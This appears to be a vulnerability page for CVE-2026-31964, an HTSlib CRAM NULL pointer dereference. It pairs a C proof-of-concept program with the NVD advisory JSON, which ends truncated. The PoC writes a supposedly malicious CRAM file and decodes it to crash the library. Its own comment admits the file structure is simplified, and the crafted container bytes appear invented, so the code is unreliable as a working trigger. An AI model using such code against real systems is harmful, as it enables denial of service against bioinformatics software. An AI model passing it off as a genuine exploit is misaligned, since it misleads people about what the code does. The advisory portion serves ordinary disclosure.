CVE-2026-31964

/* * CVE-2026-31964 PoC - HTSlib CRAM NULL pointer dereference * * This PoC demonstrates the NULL pointer dereference vulnerability in HTSlib's * CRAM format handling when processing records with omitted sequence or quality * data using CONST, XPACK, or XRLE encodings. * * Usage: Compile and run with a vulnerable version of htslib * gcc -o poc_cve2026_31964 poc_cve2026_31964.c -lhts -lcurl -lz -lbz2 -llzma -lpthread */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include "htslib/cram.h" /* Create a minimal CRAM file with crafted encoding that triggers the vulnerability */ int create_malicious_cram(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) return -1; /* CRAM file header */ unsigned char header[] = { 0x43, 0x52, 0x41, 0x4D, /* "CRAM" magic */ 0x03, 0x01, /* CRAM version 3.1 */ 0x00, 0x00, 0x00, 0x00 /* Reserved */ }; fwrite(header, 1, sizeof(header), fp); /* Crafted container with encoding that triggers NULL pointer write */ /* This is a simplified representation - real PoC would need proper CRAM structure */ unsigned char container[] = { 0x00, 0x00, 0x00, 0x00, /* Container header */ 0xFF, 0xFF, 0xFF, 0xFF, /* Block content ID */ 0x02, /* Encoding: XPACK (triggers vulnerability) */ 0x00, /* Data series indicator for omitted sequence */ 0x00, /* Additional encoding parameters */ }; fwrite(container, 1, sizeof(container), fp); fclose(fp); return 0; } int main(int argc, char **argv) { const char *cram_file = "poc.cram"; if (create_malicious_cram(cram_file) != 0) { fprintf(stderr, "Failed to create PoC file\n"); return 1; } printf("[*] PoC CRAM file created: %s\n", cram_file); printf("[*] Attempting to decode with vulnerable htslib...\n"); /* Open the malicious CRAM file - this triggers the vulnerability */ htsFile *fp = hts_open(cram_file, "r"); if (!fp) { fprintf(stderr, "[-] Failed to open CRAM file\n"); return 1; } /* Set CRAM decoder to process the file */ if (hts_set_opt(fp, HTS_OPT_REQUIRED_FIELDS, SAM_QNAME | SAM_FLAG | SAM_POS | SAM_SEQ | SAM_MAPQ) < 0) { fprintf(stderr, "[-] Failed to set CRAM options\n"); hts_close(fp); return 1; } /* Read records - this is where NULL pointer dereference occurs */ bam1_t *aln = bam_init1(); int ret; while ((ret = sam_read1(fp, NULL, aln)) >= 0) { /* Process alignment records */ } if (ret < -1) { printf("[!] NULL pointer dereference triggered - crash detected\n"); } bam_destroy1(aln); hts_close(fp); return 0; }

{"cve": {"id": "CVE-2026-31964", "sourceIdentifier": "[email protected]", "published": "2026-03-18T19:16:04.633", "lastModified": "2026-03-19T14:50:24.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. While most alignment records store DNA sequence and quality values, the format also allows them to omit this data in certain cases to save space. Due to some quirks of the CRAM format, it is necessary to handle these records carefully as they will actually store data that needs to be consumed and then discarded. Unfortunately the `CONST`, `XPACK` and `XRLE` encodings did not properly implement the interface needed to do this. Trying to decode records with omitted sequence or quality data using these encodings would result in an attempt to write to a NULL pointer. Exploiting this bug causes a NULL pointer dereference. Typically this will cause the program to crash. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo bioinformáticos. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN utilizando una variedad de codificaciones y métodos de compresión. Aunque la mayoría de los registros de alineación almacenan valores de secuencia de ADN y de calidad, el formato también permite omitir estos datos en ciertos casos para ahorrar espacio. Debido a algunas peculiaridades del formato CRAM, es necesario manejar estos registros con cuidado, ya que en realidad almacenarán datos que deben ser consumidos y luego descartados. Desafortunadamente, las codificaciones CONST, XPACK y XRLE no implementaron correctamente la interfaz necesaria para hacer esto. Intentar decodificar registros con datos de secuencia o calidad omitidos utilizando estas codificaciones resultaría en un intento de escribir en un puntero NULL. Explotar este error causa una desreferencia de puntero NULL. Típicamente, esto hará que el programa falle. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.1", "matchCriteriaId": "A069D6B6-FFF6-4DB7-9811-A568ECC4B288"}, {"vulnerable": true, "criteria": "cpe:2.3:a:htslib:htslib:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.22", "versionEndExcluding": "1.22.2", "matchCriteriaId": "D9D525C8-C8AD-4368-A39 ... (truncated)